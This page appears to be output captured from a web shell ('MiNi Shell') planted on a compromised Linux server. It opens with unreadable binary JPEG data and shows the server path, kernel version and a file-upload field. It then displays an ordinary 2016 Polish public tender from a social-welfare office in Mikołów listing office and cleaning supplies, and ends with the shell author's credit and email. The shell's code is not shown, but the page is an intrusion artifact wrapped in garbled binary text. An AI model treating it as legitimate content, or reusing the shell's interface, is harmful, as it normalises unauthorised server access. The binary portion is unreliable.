JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160303/48098-N-2016.html

<p class="kh_header"><b>Mikołów: Część 1- zakup i sukcesywna dostawa materiałów biurowych dla MOPS w Mikołowie
Część 2- zakup i sukcesywna dostawa środków czystości dla MOPS w Mikołowie
Część 3- zakup i dostawa materiałów promocyjnych dla MOPS</b><br>
<b>Numer ogłoszenia: 48098 - 2016; data zamieszczenia: 03.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 2, 43-190 Mikołów, woj. śląskie, tel. 32 3242666, faks 32 3242694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.mikolow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część 1- zakup i sukcesywna dostawa materiałów biurowych dla MOPS w Mikołowie
Część 2- zakup i sukcesywna dostawa środków czystości dla MOPS w Mikołowie
Część 3- zakup i dostawa materiałów promocyjnych dla MOPS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1- zakup i sukcesywna dostawa materiałów biurowych dla MOPS w Mikołowie
	
Szczegółowy opis przedmiotu zamówienia stanowi załącznik A do siwz.

Część 2- zakup i sukcesywna dostawa środków czystości dla MOPS w Mikołowie

Szczegółowy opis przedmiotu zamówienia stanowi załącznik B do siwz.

Część 3- zakup i dostawa materiałów promocyjnych dla MOPS w Mikołowie. 

Szczegółowy opis przedmiotu zamówienia stanowi załącznik C do siwz..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 39.83.00.00-9, 39.29.41.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.mikolow.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Mikołowie 
ul. Kolejowa 2 
43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2016 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Mikołowie 
ul. Kolejowa 2 
43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zakup i sukcesywna dostawa materiałów biurowych dla MOPS w Mikołowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i sukcesywna dostawa materiałów biurowych dla MOPS w Mikołowie
Lp.	Artykuł	Przewidywana ilość
1	2	3
1	Koperta DL białe okienko prawe	6000 szt.
2	Koperta C4	500 szt.
3	Koperta C6	3000 szt.
4	Koperta C5	300 szt.
5	Koperta B4 	250 szt.
6	Koperta z folią bąbelkową 370x480 	10 szt.
7	Blok biurowy A5 biały	20 szt.
8	Blok biurowy A4 biały	40 szt.
9	Zszywki miedziane 24/6	90 op.
10	Zszywki 23/6	1 op.
11	Zszywki rozmiar 10	2 op.
12	Marker czarny	52 szt.
13	Tablica korkowa 120 x 90	4 szt.
14	Tablica korkowa 150 x 100	2 szt.
15	Zszywacz  na zszywki rozmiar 10	2 szt.
16	Dziurkacz 	2 szt.
17	Zszywacz 	10 szt.
18	Ołówek HB	140 szt.
19	Notes samoprzylepny żółty 40x50	111 szt.
20	Notes samoprzylepny żółty 76x76	80 szt.
21	Pióro kulkowe niebieskie	72 szt.
22	Pióro kulkowe czarne	60 szt.
23	Papier ksero A4 500 szt. w ryzie, gramatura 80g.m2, certyfikat EU	550 ryz
24	Papier A4 kolor niebieski grubość min.210g 	1 op.
25	Etykiety samoprzylepna A4	2 op.
26	Skoroszyt kartonowy oczkowy biały	6000 szt.
27	Taśma klejąca 24x20	30 szt.
28	Zakreślacz żółty	20 szt.
29	Zakreślacz op. 4 szt. mix kolorów	20 op.
30	Wkład do pióra PENTEL BL 407 czarny	15 szt.
31	Wkład do pióra PENTEL BL 407 niebieski	24 szt.
32	Długopis niebieski	160 szt.
33	Koszulki na dokumenty A4	3000 szt.
34	Skoroszyt oczkowy PCV A4	150 szt.
35	Komplet markerów do tablic suchościeralnych 4 kolory + gąbka	1 kpl.
36	Klej w sztyfcie 35g	72 szt.
37	Długopis czerwony 	5 szt.
38	Baterie AA	8 szt.
39	Baterie AAA	4 szt.
40	Taśma pakowa szara 48 mm szerokość , 50 m długość	35 szt.
41	Tusz do pieczątek czerwony	8 szt.
42	Temperówka metalowa 	50 szt.
43	Gumka do gumowania 	45 szt.
44	Segregator A4 50 mix kolorów	260 szt.
45	Segregator A4 75 mix kolorów	400 szt.
46	Aktówka A4 skórzana na zamek z rączką	1 szt.
47	Skrowidz A4	10 szt.
48	Skorowidz A5	20 szt.
49	Rozszywacz	3 szt.
50	Przekładki kartonowe 1/3 A4 mix kolorów	20 op.
51	Zakładki indeksujące 20x50 mm 4 kolory	20 szt.
52	Kalkulator biurowy	6 szt.
53	Okładka do bindowania przeźroczysta op. 100 szt.	1 op.
54	Klipsy do dokumentów 19 mm	20 op.
55	Klipsy do dokumentów 25 mm	20 op.
56	Klipsy do dokumentów 41 mm	5 op.
57	Spinacze trójkątne 28mm 	25 op.
58	Spinacze trójkątne 28mm 	15 op.
59	Klej w sztyfcie 22g	10 szt.
60	Zeszyt A5 miękka oprawa 96 kartek	20 szt.
61	Teczka z gumką mix kolorów	10 szt.
62	Korektor w taśmie 	3 szt.
63	Zwrotne potwierdzanie odbioru zgodne z Kodeksem Postępowania Administracyjnego  z klejem po bokach	10000 szt.
64	Korektor w piórze 	24 szt.
65	Bibuła marszczona (biała, żółta, pomarańczowa, czerwona, różowa, fioletowa, niebieska, granatowa, jasno zielona, ciemno zielona, brązowa, szara, czarna) po 10 szt z każdego koloru	130 szt
66	Szary papier rozmiar min. 100 x 130 cm	5 zwojów
67	Brystol kolorowy (biały, żółty, pomarańczowy, czerwony, różowy, fioletowy, niebieski, granatowy, jasno zielony, ciemno zielony, brązowy, szary, czarny) gramatura min. 115g, 
rozmiar B1- po 10 arkuszy z każdego koloru	130 szt
68	Pastele suche 24 kolory w opakowaniu	10 op.
69	Pastele olejne 24 kolory w opakowaniu	10 op.
70	Folia aluminiowa 50 m	10 szt.
71	Folia spożywcza 45 cm x 300 m	4 szt.
72	Brokat w kleju różne kolory, pakowane po 6 szt.	40 op.
73	Mazaki dwustronne 10 różnych kolorów w opakowaniu	30 op.
74	Teczki białe z gumką A4	110 szt.
75	Papier ksero kolorowy mix A4	20 op.
76	Blok techniczny biały A4	70 op.
77	Blok techniczny kolorowy A4	50 op.
78	Blok techniczny biały A3	5 szt.
79	Blok techniczny kolorowy A3	5 szt.
80	Cienkopis (czarny, niebieski, zielony, czerwony) po 60 szt z każdego koloru
	240 szt
81	Markery (niebieski, zielony, czerwony) po 20 szt z każdego koloru	60 szt
82	Taśma klejąca biurowa szer. 40 mm	60 szt.
83	Bibuła gładka kolorowa (blok A4)	30 szt.
84	Notes samoprzylepny żółty 51x38 mm	36 szt.
85	Pinezki 100 szt.	20 op.
86	Pinezki kolorowe 50 szt.	10 op.
87	Gumki recepturki mix rozmiarów min. 250 szt.	5 op.
88	Papier samoprzylepny kolorowy (blok A4)	30 szt.
89	Taśma dwustronna szerokość min. 38mm długość min. 25m 	15 szt.
90	Taśma ozdobna materiałowa mix kolorów szerokość min. 0,5 cm długość min. 200m	10 szt. 
91	Cyrkiel	10 szt.
92	Papier milimetrowy w bloku A4	5 szt.
93	Nożyczki biurowe do papieru 20 cm	2 szt.
94	Nożyczki szkolne do papieru 13 cm	3 szt.
95	Wymazywacz do pióra (z poprawiaczem)	30 szt.
96	Farby plakatowe 12 kolorów	14 op.
97	Plastelina 12 kolorów	14 op.
98	Papier ozdobny techniczny A4 (złoty, srebrny, granat, bordo)	po 10 szt. z każdego koloru
99	Klej typu Magic 45g	66 szt.
100	Linijka 20 cm	10 szt.
101	Linijka 40 cm	10 szt.
102	Kredki typu Bambino ołówkowe 24 kolory	26 szt.
103	Kredki typu Bambino świecowe 24 kolory	26 szt.
104	Masa mocująca 35 g np. do przyklejania plakatów, dekoracji, obrazków itp	10 szt.
105	Dziennik zajęć rewalidacyjno-wychowawczych grupy	6 szt.
106	Dziennik lekcyjny w sztywnej okładce	1 szt.
107	Pinezki/szpilki do  tablicy korkowej
- opakowanie min. 30 szt.
	3 op.
108	Blok do flipchartów
- wymiar 100 x 65 cm po 40 arkuszy	3 op.
109	Flipchart 
- rama aluminiowa
- trójnożny stojak o regulowanej wysokości
- półka na markery
- uchwyt do zawieszania bloku
- wymiar  70 x 100 cm
	2 szt
110	Czajnik bezprzewodowy 
- moc.min 2000W
- pojemość min.1,7 litra
- płaska grzałka płytowa	1 szt
111	Wycieraczka do butów gumowa	1 szt
112	Kosz z tworzywa okrągły na papier 	3 szt

Wszystkie materiały stanowiące przedmiot zamówienia muszą być fabrycznie nowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zakup i sukcesywna dostawa środków czystości dla MOPS w Mikołowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakup i sukcesywna dostawa środków czystości dla MOPS w Mikołowie

L.p	Artykuł	Przewidywana ilość
1	2	3
1	Mydło w płynie
- pojemność min 5 litrów	80 l
2	Mydło w płynie z dozownikiem
- pojemność min 0,5 litra	10 szt.
3	Uniwersalny płyn do mycia podłóg
- pojemność min 1 litr	45 szt.
4	Papier toaletowy
-biały
- 2 warstwowy	2560 rolek
5	Płyn do usuwania kamienia i rdzy w sprayu
- pojemność min 0,5 litra	15 szt
6	Mleczko do czyszczenia
- pojemność min 0,75 litra	40 szt
7	Kostka do WC z koszyczkiem 
- waga min. 35 g
- ilość kostek w koszyku min. 1	90 szt.
8	Odświeżacz stojący w żelu 
- gramatura min.150g	40 szt.
9	Odświeżacz powietrza w sprayu
- pojemność min. 300 ml	45 szt.
10	Rękawice gumowe rozmiar L  op.2 szt.	5 op
11	Worki na śmieci 
- pojemość 35 litrów
- 50 szt. w opakowaniu 	90 op.
12	Worki na śmieci 
- pojemość 60 litrów
- min 50 szt. w opakowaniu 	80 op.
13	Środek do pielęgnacji mebli w sprayu
- przeciw kurzowi
- pojemność min 250ml	20 szt.
14	Płyn do mycia naczyń
- pojemność min.0,9 litra	10 szt.
15	Pieluchy tetrowe	30 szt.
16 	Środek czystości - płyn do toalet 5l	13 szt.
17	Ręczniki papierowe
- kolor biały
- ilość warstw 2
- długość min. 100 metrów
	100 szt.
18	Pasta do zębów dla dzieci
- ochrona przed próchnicą
- działanie przeciwbakteryjne
- pojemność min. 50ml	60 szt.
19	Druciak do mycia garnków	30 szt.
20	Gąbki do naczyń duża wym.min  9x7cm	30 szt.
21	Szmatki do mycia z mikrofibry
- wymiary min. 40x40 cm
- włókno 100% micro fibra
- gramatura min. 300g
- opakowanie minimum 5 sztuk	30 op.
22	Płyn do mycia naczyń 5l	8 szt.
23	Wkład sznurkowy  do mopa 	10 szt.
24	Kij drewniany do mopa z gwintem
-długość  min. 140 cm	5 szt.
25	Proszek  do prania dywanów
-pojemność min. 650g	6 szt.
26	Środek do udrażniania rur
- pojemość min 0.5 kg
- konsystencja granulowana	10 szt.
27	Proszek do prania min 5kg	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zakup i dostawa materiałów promocyjnych dla MOPS w Mikołowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakup i dostawa materiałów promocyjnych dla MOPS w Mikołowie
Przedmiotem zamówienia jest wykonanie:
1.	plakatów formatu A3 - 297 x 420 mm na papierze kredowym, kolorowy, jednostronny - 50 szt., ulotki A5, na papierze kredowym, dwustronne, kolorowe x 100 szt. (opracowanie redakcyjne, graficzne, przygotowanie do druku, druk itp.)
2.	stojak rollup z plakatem (aluminiowy) (opracowanie redakcyjne, graficzne, przygotowanie do druku, druk itp.)
3.	tabliczka PCV 3 mm lub pleksi, format A4, zadruk jednostronny pełnokolorowy.

Obowiązki Wykonawcy:
Wykorzystanie do realizacji zmówienia treści utworzonej przez Zamawiającego, która zostanie przekazana Wykonawcy w dniu podpisania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostawy liczony od dnia zawarcia umowy - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com